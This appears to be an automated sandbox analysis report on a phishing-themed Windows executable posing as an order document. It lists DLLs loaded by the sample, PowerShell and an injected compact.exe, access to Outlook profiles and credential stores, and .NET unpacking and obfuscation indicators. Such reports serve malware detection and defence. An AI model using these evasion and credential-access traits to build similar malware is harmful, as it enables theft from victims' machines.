            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: compact.pdbGCTL source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OFEkXEMCZC.exe, 0000000A.00000000.2448002882.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, OFEkXEMCZC.exe, 0000000E.00000000.2595889432.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdbSHA256 source: spec 4008670601 AZTEK Order.exe
            Source: Binary string: wntdll.pdb source: spec 4008670601 AZTEK Order.exe, spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: compact.pdb source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdb source: spec 4008670601 AZTEK Order.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: spec 4008670601 AZTEK Order.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs.Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 12.2.compact.exe.3d9cd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 15.2.firefox.exe.26bbcd08.0.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: 0xDC4DDEC0 [Fri Feb 14 19:53:36 2087 UTC]
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA6547 push ds; iretd 0_2_06DA654F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 0_2_06DA3AD7 push ebx; retf 0_2_06DA3ADA
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00402061 push es; iretd 6_2_00402076
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0040C158 push ecx; retf 6_2_0040C159
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004021D9 push 77CEFDB6h; ret 6_2_004021E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00417238 push ebx; retf 6_2_00417239
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00411AA5 push esp; iretd 6_2_00411AAB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00411AB9 push 1CFC06C9h; ret 6_2_00411ABE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00408300 push es; retf 6_2_0040831F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004033A0 push eax; ret 6_2_004033A2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0040BC07 push ss; ret 6_2_0040BC09
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004164C3 push ebp; retf 18B7h6_2_00416449
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0040750F push ebp; retf 6_2_00407510
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_004125BB push esp; ret 6_2_004125CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00418F6C push cs; iretd 6_2_00418F71
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_00413FE4 push 00000030h; iretd 6_2_00413FE9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A09AD push ecx; mov dword ptr [esp], ecx6_2_017A09B6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D225F pushad ; ret 12_2_036D27F9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D27FA pushad ; ret 12_2_036D27F9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037009AD push ecx; mov dword ptr [esp], ecx12_2_037009B6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D283D push eax; iretd 12_2_036D2858
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD3120 push ebp; retf 18B7h12_2_02DD30A6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DC416C push ebp; retf 12_2_02DC416D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCE716 push 1CFC06C9h; ret 12_2_02DCE71B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCE702 push esp; iretd 12_2_02DCE708
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCE400 push esi; iretd 12_2_02DCE407
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DC8864 push ss; ret 12_2_02DC8866
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DC4F5D push es; retf 12_2_02DC4F7C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD0C41 push 00000030h; iretd 12_2_02DD0C46
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DC8DB5 push ecx; retf 12_2_02DC8DB6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DE2D10 pushfd ; retf 12_2_02DE2D88
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: section name: .text entropy: 7.978470618395233
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, qA9RwWS5F6FWCWFdeB.csHigh entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LhKXYDnDrCC31IYC1l.csHigh entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, eV9V7MD7jcQe67EKiX.csHigh entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, ylQaofKffa4LIes7R5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, XtCPEIPI0vwmxjU1yCT.csHigh entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, pdbENd1sSmsdBwH33k.csHigh entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, lQu5AaJnCEQNfsoTrX.csHigh entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, tbwg0rTy7Rm4lPvbFt.csHigh entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, Dra8tFQfXTtjhUEabr.csHigh entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, zgFrk5lnN0batYPMjA.csHigh entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.csHigh entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, V9PtclERpC4X1BqTDy.csHigh entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, suymARO42b2OJQh7HL.csHigh entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, QM8C5hZiKlLbJdDmtr.csHigh entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, BSsJEhcGdlS5HkGCDT.csHigh entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, dB7d8mFu5eUU8getxb.csHigh entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, Jhfxhhw7tJ6PfM1FNn.csHigh entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LMx5uOpTP1v1ft95hN.csHigh entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, plyn4AzrwpREROgjZj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, IJHR3K72f7raiuBq1W.csHigh entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, qA9RwWS5F6FWCWFdeB.csHigh entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LhKXYDnDrCC31IYC1l.csHigh entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, eV9V7MD7jcQe67EKiX.csHigh entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, ylQaofKffa4LIes7R5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, XtCPEIPI0vwmxjU1yCT.csHigh entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, pdbENd1sSmsdBwH33k.csHigh entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, lQu5AaJnCEQNfsoTrX.csHigh entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, tbwg0rTy7Rm4lPvbFt.csHigh entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, Dra8tFQfXTtjhUEabr.csHigh entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, zgFrk5lnN0batYPMjA.csHigh entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
